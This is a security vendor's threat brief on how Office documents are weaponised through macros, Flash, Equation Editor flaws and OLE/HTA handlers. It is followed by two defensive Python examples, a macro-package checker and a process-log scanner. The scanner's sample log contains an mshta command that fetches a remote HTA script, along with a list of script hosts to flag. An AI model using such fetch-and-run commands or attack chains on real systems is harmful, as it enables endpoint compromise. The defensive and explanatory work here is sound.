# Threat Brief: The Office Documents We Use Every Day May Pose Security Risks

By [Liat Hayun](https://www.paloaltonetworks.com/blog/author/liat-hayun/?lang=zh-hans&ts=markdown "Posts by Liat Hayun"), Oct 08, 2018

Almost everyone uses Microsoft Office documents. We run into them everywhere: work documents, electronic receipts, the lease for a new apartment, and so on. So when an email arrives with an Office document attached, we are quite likely to open it without a second thought. Attackers know that people open the vast majority of documents even when they do not come from a trusted source, so they routinely use these files in attacks to compromise systems.

In this threat brief we show five different ways Office documents are broken and abused to launch attacks and compromise Windows endpoints. Some of these methods have been published before; others are described here for the first time.

## Macros

Macros are the most direct way for attackers to turn an Office document into an attack tool. Office applications have a built-in scripting engine that runs VBA (Visual Basic for Applications) scripts. These scripts can execute as soon as the document is opened, without any user interaction (assuming the user has previously enabled macros), and run malicious code on the system. If the user has not enabled macros, a pop-up appears asking the user to click to enable them. That pop-up is one of several security mechanisms Microsoft added to reduce the risk posed by macros. Microsoft also enforces a different file extension (a new document containing macros gets the .docm extension rather than .docx). Despite these measures, users still choose to open these files and enable their content, so macros remain a common attack vector, in large-scale campaigns and simple attacks alike, for delivering ransomware such as [Emotet](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Emotet) or launching [sophisticated campaigns such as Sofacy](https://www.paloaltonetworks.com/blog/2018/02/unit42-sofacy-attacks-multiple-government-entities/?ts=markdown).

![WordDocImage1zhCN](https://www.paloaltonetworks.com/blog/wp-content/uploads/2018/10/WordDocImage1zhCN.png)

Figure 1. The Sofacy document before and after enabling content

As the figure shows, attackers use social engineering to persuade the user to disable the security mechanism Microsoft added and enable content in order to see the full document. In the Sofacy example, the attacker simply set the font color to white: the text was already there before the user enabled macros, it just was not visibly displayed.

## Embedded Flash files

Besides built-in features such as macros, external objects such as Adobe Flash files can also be embedded in Office documents. Because these objects are handed to the corresponding software for processing, a vulnerability in that software can be exploited by embedding the trigger in the Adobe Flash content of an Office document. One example of attackers using this vector is [CVE-2018-4878](https://www.paloaltonetworks.com/blog/2018/02/unit42-traps-prevents-adobe-flash-player-zero-day/?ts=markdown), a zero-day exploit against Adobe Flash Player delivered by embedding a SWF file in an Excel document. In these attacks, the Adobe Flash content contained in the malicious Excel document triggers the Flash vulnerability and executes the embedded shellcode.

## Microsoft Equation Editor

Much as an Adobe Flash file can be embedded in an Office document, a document can also embed equations that are parsed by Microsoft Equation Editor (a program that makes it easy to write mathematical formulas):

![WordDocImage2zhCN](https://www.paloaltonetworks.com/blog/wp-content/uploads/2018/10/WordDocImage2zhCN.png)

Figure 2. Microsoft Equation Editor

As in the previous examples, attackers can exploit vulnerabilities in Equation Editor through a malicious Office document. We recently learned that when [CVE-2017-11882](https://www.paloaltonetworks.com/blog/2017/12/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/?ts=markdown) was exploited, vulnerabilities such as [CVE-2018-0802](https://www.paloaltonetworks.com/blog/2018/01/unit42-traps-prevents-microsoft-office-equation-editor-zero-day-cve-2017-11882/?ts=markdown) were exploited as well; both of these Equation Editor vulnerabilities let an attacker execute code remotely when the user opens the Office document. Although no real-world cases have been found yet, Unit 42 researchers have discovered exploits for similar vulnerabilities in Microsoft Equation Editor, such as [CVE-2018-0807](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0807) and [CVE-2018-0798](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798).

Note that because Microsoft Equation Editor runs as a separate process (eqnedt32.exe), protections aimed at Microsoft Office such as EMET and Windows Defender Exploit Guard do not help here, since they only protect the Microsoft Office processes themselves (such as winword.exe).

## OLE objects and HTA handlers

OLE objects and HTA handlers are mechanisms that Office documents use to reference other documents and include them in their own content. Attackers can use these mechanisms to compromise an endpoint as follows:

* An OLE2 embedded link object is embedded in a Microsoft Word document
* When the document is opened, the Word process (winword.exe) sends an HTTP request to a remote server to retrieve an HTA file containing a malicious script
* winword.exe then looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script

By exploiting [CVE-2017-0199](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199) (a Microsoft Office/WordPad remote code execution (RCE) vulnerability that Microsoft fixed in September 2017), this capability was used in several campaigns, for example the [OilRig campaign](https://www.paloaltonetworks.com/blog/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/?ts=markdown).

![WordDocImage3zhCN](https://www.paloaltonetworks.com/blog/wp-content/uploads/2018/10/WordDocImage3zhCN.png)

Figure 3. An RTF file that looks exactly like a regular Word document

Beyond the OLE and HTA exploitation described above, attackers found that RTF files can also use MSHTML to execute OLE objects of the "text/html" MIME type. This means an RTF document exposes the same attack surface as Internet Explorer! Using this logic flaw ([CVE-2018-8174](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174)), an attacker can execute arbitrary HTML/JavaScript/VBScript. Code executed this way is sandboxed (it cannot start new processes, write to the file system, and so on), but, just like any other code running in Internet Explorer, it can use this flaw as a stepping stone to exploit other vulnerabilities (such as a memory-corruption use-after-free vulnerability in the VBScript engine), gain arbitrary code execution inside the Word application (winword.exe), and take control of the system.

## Conclusion

Although document-based attacks have been a common attack vector for more than a decade, we have seen both the prevalence and the sophistication of these attacks rise recently. One likely reason is that browser vendors have hardened their products, making browser vulnerabilities increasingly difficult to exploit. Whatever the reason, organizations must know how to defend against these common techniques.

## Defense

To defend against these threats, Palo Alto Networks Traps advanced endpoint protection provides several malware and exploit protections:

* Macro inspection - Traps uses the WildFire threat intelligence cloud and local machine learning to detect malicious macros in every Office document and prevent users from opening these malicious files.
* Exploit protection - Traps' broad exploit protection prevents such exploitation attempts from successfully running malicious shellcode on the targeted endpoint.
* Traps continuously monitors Office applications to ensure legitimate built-in processes are not used to execute malicious traffic.
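The macro section notes that Microsoft keeps VBA-bearing documents under a distinct extension (.docm rather than .docx). A first triage step for incoming attachments is therefore to open the OOXML package and check whether a VBA project is present and whether the name admits it. This is an added example written for this page, not Traps code or anything from the original post; the sample packages are constructed in memory and are not real Word documents.

```python
import io
import zipfile

# Package parts that carry VBA code in Word, Excel and PowerPoint OOXML files.
VBA_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
# Extensions that promise a macro-free document.
MACRO_FREE_EXTS = {"docx", "dotx", "xlsx", "xltx", "pptx", "potx"}


def inspect_ooxml(filename: str, data: bytes) -> dict:
    """Classify one file: does the zip hold a VBA project, and does the
    extension admit it? Returns ext, vba_parts, macro_content_type, verdict."""
    ext = filename.rsplit(".", 1)[-1].lower()
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
            ctypes = ""
            if "[Content_Types].xml" in names:
                ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    except zipfile.BadZipFile:
        # Legacy .doc/.xls (OLE2 compound files) and junk are out of scope here.
        return {"ext": ext, "vba_parts": [], "macro_content_type": False, "verdict": "not-ooxml"}
    parts = [p for p in VBA_PARTS if p in names]
    macro_ct = "macroEnabled" in ctypes  # e.g. ...word.document.macroEnabled.main+xml
    if parts and ext in MACRO_FREE_EXTS:
        verdict = "mismatch"       # VBA inside, but the name promises a macro-free file
    elif parts or macro_ct:
        verdict = "macro-enabled"  # honestly labelled; still worth a closer look
    else:
        verdict = "no-macro"
    return {"ext": ext, "vba_parts": parts, "macro_content_type": macro_ct, "verdict": verdict}


def build_sample(with_vba: bool) -> bytes:
    """Constructed minimal package for the demo; not a real Word document."""
    main_ct = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_vba else
               "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/word/document.xml" ContentType="{main_ct}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for name, vba in (("lease.docx", False), ("lease.docx", True), ("lease.docm", True)):
        print(name, inspect_ooxml(name, build_sample(vba))["verdict"])
```

A "mismatch" verdict is a sign of tampering worth quarantining, not proof the macros would run; deciding whether VBA executes is Word's job, and this check only reports what the package contains.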
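The OLE/HTA chain (winword.exe asking mshta.exe to run a script) and the separate Equation Editor process (eqnedt32.exe, outside the reach of EMET-style Office protections) both leave a parent/child trace that endpoint process monitoring can catch. The following is an added example of that detection logic, not code from the post or from Traps; the log line format, the rule that eqnedt32.exe should never spawn a child, and the sample events are all assumptions constructed for the demo.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts an Office application should not be launching straight from a document.
SUSPICIOUS_CHILDREN = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
EQNEDT = "eqnedt32.exe"  # Equation Editor runs as its own process (see the post)

# Assumed line format (constructed for this example, not a real product's schema):
#   <timestamp> parent="<path>" image="<path>" cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) parent="(?P<parent>[^"]*)" image="(?P<image>[^"]*)" cmd="(?P<cmd>[^"]*)"$')


def basename(path: str) -> str:  # lower-case file name from a Windows or POSIX path
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(parent: str, image: str):
    """Alert tag for one process-creation event, or None when nothing stands out."""
    parent, image = basename(parent), basename(image)
    if parent in OFFICE_APPS and image in SUSPICIOUS_CHILDREN:
        return f"office-spawned-{image}"   # e.g. winword.exe -> mshta.exe (HTA handler chain)
    if parent == EQNEDT:
        return "eqnedt32-child-process"    # heuristic: a formula renderer spawns nothing
    return None


def scan(lines):
    """Return [(timestamp, tag, child_name)] for every event a rule matches."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip it rather than stop the scan
        tag = classify(m["parent"], m["image"])
        if tag:
            alerts.append((m["ts"], tag, basename(m["image"])))
    return alerts


# Constructed sample events; paths, times and command lines are made up for the demo.
SAMPLE_LOG = [
    r'2018-10-08T09:14:02Z parent="C:\Windows\explorer.exe" image="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" cmd="WINWORD.EXE lease.rtf"',
    r'2018-10-08T09:14:05Z parent="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" image="C:\Windows\splwow64.exe" cmd="splwow64.exe 12288"',
    r'2018-10-08T09:14:07Z parent="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" image="C:\Windows\System32\mshta.exe" cmd="mshta.exe http://example.invalid/update.hta"',
    r'2018-10-08T09:20:11Z parent="C:\Windows\System32\svchost.exe" image="C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" cmd="EQNEDT32.EXE -Embedding"',
    r'2018-10-08T09:20:12Z parent="C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" image="C:\Windows\System32\cmd.exe" cmd="cmd.exe /c placeholder"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(*alert)
```

The print-spooler helper (splwow64.exe) and the COM-launched Equation Editor itself are left alone; only the two chains the post describes produce alerts.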